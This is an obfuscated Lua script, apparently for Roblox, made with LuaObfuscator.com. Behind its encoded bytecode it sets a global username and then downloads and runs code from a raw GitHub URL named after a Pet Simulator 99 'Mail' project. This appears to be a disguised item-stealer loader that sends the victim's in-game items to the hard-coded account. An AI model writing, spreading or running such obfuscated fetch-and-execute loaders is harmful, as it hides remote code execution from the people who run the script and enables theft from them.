--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v73=v5(v67,v19);v19=nil;return v73;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + (941 -(282 + 595)))))) ;return v68-(v68%1) ;else local v69=(933 -(857 + 74))^(v32-1) ;return (((v31%(v69 + v69))>=v69) and (569 -(367 + 201))) or (927 -(214 + 179 + 534)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + (1069 -(68 + 997)) ;return (v40 * ((40025592 -23247106) -(226 + 1044))) + (v39 * (14533 + 51003)) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 -0 ,(9 + 17) -(5 + 1) ) * ((3 -1)^((844 -(201 + 571)) -40))) + v41 ;local v45=v20(v42,371 -(87 + 263) ,211 -(67 + 113) );local v46=((v20(v42,(1162 -(116 + 1022)) + 8 )==1) and  -((4 -3) + 0)) or (1 -0) ;if (v45==(0 -0)) then if (v44==((465 + 326) -(368 + 423))) then return v46 * (0 + 0) ;else v45=19 -(10 + 8) ;v43=0 -0 ;end elseif (v45==(8135 -(22225 -16137))) then return ((v44==(952 -(802 + 150))) and (v46 * ((2 -1)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1855 -832) ) * (v43 + (v44/((2 + 0)^(1049 -((3249 -2334) + 82))))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(859 -(814 + 45))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(2 -1) );v18=v18 + v47 ;local v49={};for v65=1, #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50==(1701 -(1419 + 281))) then v53=nil;v54=nil;v50=2 -0 ;end if (v50==(74 -(71 + 3))) then v51=0 + 0 ;v52=nil;v50=1;end if ((4 -2)~=v50) then else v55=nil;v56=nil;v50=3 -0 ;end if (v50~=3) then else v57=nil;while true do local v74=0;while true do if (v74==(241 -(187 + 54))) then local v92=0;while true do if (v92==1) then v74=1;break;end if (v92~=0) then else if (v51~=(781 -(162 + 618))) then else local v98=0 + 0 ;while true do if (v98~=1) then else for v146=1 + 0 ,v56 do local v147=0 -0 ;local v148;local v149;while true do if (v147~=(1 -0)) then else if (v148==(1 + 0)) then v149=v21()~=(1636 -(1373 + 263)) ;elseif (v148==(1002 -(451 + 549))) then v149=v24();elseif (v148~=(1 + 2)) then else v149=v25();end v57[v146]=v149;break;end if (v147==(0 -0)) then v148=v21();v149=nil;v147=1 -0 ;end end end v55[3]=v21();v98=1386 -(746 + 638) ;end if (v98==2) then v51=2;break;end if (v98~=0) then else local v117=0 + 0 ;while true do if (0~=v117) then else v56=v23();v57={};v117=1 -0 ;end if (v117~=1) then else v98=342 -(218 + 123) ;break;end end end end end if (2==v51) then local v99=0;while true do if (v99==(1582 -(1535 + 46))) then return v55;end if (v99~=(0 + 0)) then else for v150=1 + 0 ,v23() do local v151=560 -(306 + 254) ;local v152;local v153;local v154;while true do if (v151==(1 + 0)) then v154=nil;while true do if (v152~=(0 -0)) then else local v167=1467 -(899 + 568) ;local v168;while true do if (v167~=(0 + 0)) then else v168=0 -0 ;while true do if (v168==(603 -(268 + 335))) then local v175=290 -(60 + 230) ;while true do if (v175~=1) then else v168=573 -(426 + 146) ;break;end if (v175==0) then v153=0;v154=nil;v175=1;end end end if (v168==1) then v152=1;break;end end break;end end end if ((1 + 0)~=v152) then else while true do if (v153~=(1456 -(282 + 1174))) then else v154=v21();if (v20(v154,812 -(569 + 242) ,2 -1 )==0) then local v169=0 + 0 ;local v170;local v171;local v172;local v173;local v174;while true do if (v169==(1025 -(706 + 318))) then v172=nil;v173=nil;v169=1253 -(721 + 530) ;end if (v169==(1271 -(945 + 326))) then v170=0 -0 ;v171=nil;v169=1 + 0 ;end if ((702 -(271 + 429))==v169) then v174=nil;while true do if ((2 + 0)~=v170) then else while true do if (v171==(1500 -(1408 + 92))) then local v179=0;local v180;while true do if (v179==(1086 -(461 + 625))) then v180=0;while true do if (v180~=(1288 -(993 + 295))) then else v172=v20(v154,1 + 1 ,1174 -(418 + 753) );v173=v20(v154,2 + 2 ,6);v180=1;end if (v180==(1 + 0)) then v171=1 + 0 ;break;end end break;end end end if (v171==(1 + 2)) then if (v20(v173,532 -(406 + 123) ,1772 -(1749 + 20) )~=1) then else v174[1 + 3 ]=v57[v174[4]];end v52[v150]=v174;break;end if (v171==(1324 -(1249 + 73))) then local v182=0 + 0 ;while true do if (0==v182) then local v187=1145 -(466 + 679) ;local v188;while true do if (v187~=0) then else v188=0;while true do if (v188~=(0 -0)) then else if (v20(v173,2 -1 ,1901 -(106 + 1794) )==1) then v174[1 + 1 ]=v57[v174[1 + 1 ]];end if (v20(v173,5 -3 ,5 -3 )==(115 -(4 + 110))) then v174[587 -(57 + 527) ]=v57[v174[1430 -(41 + 1386) ]];end v188=104 -(17 + 86) ;end if (v188==(1 + 0)) then v182=1;break;end end break;end end end if (v182==1) then v171=6 -3 ;break;end end end if (v171==1) then local v183=0 -0 ;local v184;while true do if (v183~=0) then else v184=166 -(122 + 44) ;while true do if (v184==0) then local v190=0;while true do if (0==v190) then v174={v22(),v22(),nil,nil};if (v172==0) then local v195=0 + 0 ;local v196;while true do if (v195~=(0 -0)) then else v196=65 -(30 + 35) ;while true do if (v196==0) then v174[3 + 0 ]=v22();v174[4]=v22();break;end end break;end end elseif (v172==1) then v174[3]=v23();elseif (v172==(1259 -(1043 + 214))) then v174[3]=v23() -((7 -5)^16) ;elseif (v172~=3) then else local v201=1212 -(323 + 889) ;local v202;local v203;while true do if (v201~=(2 -1)) then else while true do if (v202==(580 -(361 + 219))) then v203=0;while true do if (v203==0) then v174[323 -(53 + 267) ]=v23() -((1 + 1)^(429 -(15 + 398))) ;v174[986 -(18 + 964) ]=v22();break;end end break;end end break;end if (v201~=(0 -0)) then else v202=0;v203=nil;v201=1 + 0 ;end end end v190=1;end if (1==v190) then v184=1;break;end end end if (1==v184) then v171=2;break;end end break;end end end end break;end if (v170~=(0 + 0)) then else local v176=0;local v177;while true do if (v176==0) then v177=0;while true do if (v177~=1) then else v170=851 -(20 + 830) ;break;end if (v177==(0 + 0)) then local v189=0;while true do if (0==v189) then v171=0;v172=nil;v189=1;end if (1~=v189) then else v177=127 -(116 + 10) ;break;end end end end break;end end end if (v170==1) then local v178=0 + 0 ;while true do if (v178==(739 -(542 + 196))) then v170=2;break;end if (0==v178) then v173=nil;v174=nil;v178=1 -0 ;end end end end break;end end end break;end end break;end end break;end if (v151==(0 + 0)) then v152=0 + 0 ;v153=nil;v151=1 + 0 ;end end end for v155=2 -1 ,v23() do v53[v155-(2 -1) ]=v28();end v99=1;end end end v92=1552 -(1126 + 425) ;end end end if (v74==1) then if (v51==(405 -(118 + 287))) then local v97=0 -0 ;while true do if (v97==(1122 -(118 + 1003))) then local v100=0 -0 ;while true do if (v100==1) then v97=2;break;end if ((377 -(142 + 235))==v100) then v54={};v55={v52,v53,nil,v54};v100=1;end end end if (v97~=(977 -(553 + 424))) then else v52={};v53={};v97=1 -0 ;end if (v97==2) then v51=1;break;end end end break;end end end break;end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v75=v62;local v76=v63;local v77=v64;local v78=v27;local v79=1;local v80= -1;local v81={};local v82={...};local v83=v12("#",...) -1 ;local v84={};local v85={};for v89=0,v83 do if (v89>=v77) then v81[v89-v77 ]=v82[v89 + 1 ];else v85[v89]=v82[v89 + 1 ];end end local v86=(v83-v77) + 1 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1];if (v88<=10) then if (v88<=4) then if (v88<=1) then if (v88>0) then do return;end else local v101=v87[2];local v102=v85[v87[3]];v85[v101 + 1 ]=v102;v85[v101]=v102[v87[4]];end elseif (v88<=2) then v79=v87[3];elseif (v88>3) then local v118=0;local v119;while true do if (v118==0) then v119=v87[2];v85[v119]=v85[v119](v13(v85,v119 + 1 ,v80));break;end end else v60[v87[3]]=v85[v87[2]];end elseif (v88<=7) then if (v88<=5) then if ((v87[3]=="_ENV") or (v87[3]=="getfenv")) then v85[v87[2]]=v60;else v85[v87[2]]=v60[v87[3]];end elseif (v88>6) then v85[v87[2]]=v87[3];else v85[v87[2]]();end elseif (v88<=8) then for v112=v87[2],v87[3] do v85[v112]=nil;end elseif (v88>9) then v79=v87[3];else local v128=v87[2];local v129,v130=v78(v85[v128](v13(v85,v128 + 1 ,v87[3])));v80=(v130 + v128) -1 ;local v131=0;for v157=v128,v80 do v131=v131 + 1 ;v85[v157]=v129[v131];end end elseif (v88<=15) then if (v88<=12) then if (v88==11) then v85[v87[2]]();elseif ((v87[3]=="_ENV") or (v87[3]=="getfenv")) then v85[v87[2]]=v60;else v85[v87[2]]=v60[v87[3]];end elseif (v88<=13) then local v107=v87[2];local v108=v85[v87[3]];v85[v107 + 1 ]=v108;v85[v107]=v108[v87[4]];elseif (v88>14) then local v135=v87[2];local v136,v137=v78(v85[v135](v13(v85,v135 + 1 ,v87[3])));v80=(v137 + v135) -1 ;local v138=0;for v160=v135,v80 do v138=v138 + 1 ;v85[v160]=v136[v138];end elseif (v85[v87[2]]==v87[4]) then v79=v79 + 1 ;else v79=v87[3];end elseif (v88<=18) then if (v88<=16) then for v114=v87[2],v87[3] do v85[v114]=nil;end elseif (v88==17) then v60[v87[3]]=v85[v87[2]];else do return;end end elseif (v88<=19) then if (v85[v87[2]]==v87[4]) then v79=v79 + 1 ;else v79=v87[3];end elseif (v88>20) then v85[v87[2]]=v87[3];else local v144=v87[2];v85[v144]=v85[v144](v13(v85,v144 + 1 ,v80));end v79=v79 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503093O004F646B64626662666A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012153O00014O0010000100013O0026133O00020001000100040A3O00020001001215000100013O002613000100050001000100040A3O00050001001215000200033O001211000200023O001205000200043O001205000300053O00202O000300030006001215000500074O0009000300054O001400023O00022O000B00020001000100040A3O0014000100040A3O0005000100040A3O0014000100040A3O000200012O00013O00017O00",v9(),...);
